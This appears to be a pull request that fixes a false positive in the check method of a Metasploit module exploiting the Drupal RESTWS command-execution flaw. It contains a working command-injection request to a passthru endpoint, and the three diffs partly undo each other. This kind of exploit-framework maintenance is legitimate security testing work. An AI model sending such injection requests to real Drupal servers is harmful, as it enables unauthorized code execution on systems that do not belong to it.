### PR TITLE
Fix drupal_restws_exec check method false positive

### DIFF
--- a/modules/exploits/unix/webapp/drupal_restws_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_restws_exec.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'index.php'),
       'vars_get' => {
-        'q' => "taxonomy_vocabulary//passthru/printf \"#{Rex::Text.to_octal(r)}\""
+        'q' => "taxonomy_vocabulary//passthru/printf '#{Rex::Text.to_octal(r)}'"
       }
     )
     if res && res.body.include?(r)

--- a/modules/exploits/unix/webapp/drupal_restws_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_restws_exec.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'index.php'),
       'vars_get' => {
-        'q' => "taxonomy_vocabulary//passthru/echo #{r}"
+        'q' => "taxonomy_vocabulary//passthru/printf #{Rex::Text.to_octal(r, '\\\\')}"
       }
     )
     if res && res.body.include?(r)

--- a/modules/exploits/unix/webapp/drupal_restws_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_restws_exec.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'index.php'),
       'vars_get' => {
-        'q' => "taxonomy_vocabulary//passthru/printf #{Rex::Text.to_octal(r, '\\\\')}"
+        'q' => "taxonomy_vocabulary//passthru/printf \"#{Rex::Text.to_octal(r)}\""
       }
     )
     if res && res.body.include?(r)


### PR DESCRIPTION
For #7108.
- [x] Install Drupal 7.5: https://ftp.drupal.org/files/projects/drupal-7.5.tar.gz
- [x] Run `check`
- [x] See that the target is not vulnerable (false positive was here)
- [x] Install Entity API (required for RESTWS): https://ftp.drupal.org/files/projects/entity-7.x-1.7.tar.gz
- [x] Install RESTWS 2.5: https://ftp.drupal.org/files/projects/restws-7.x-2.5.tar.gz
- [x] Run `check`
- [x] See that the target is vulnerable
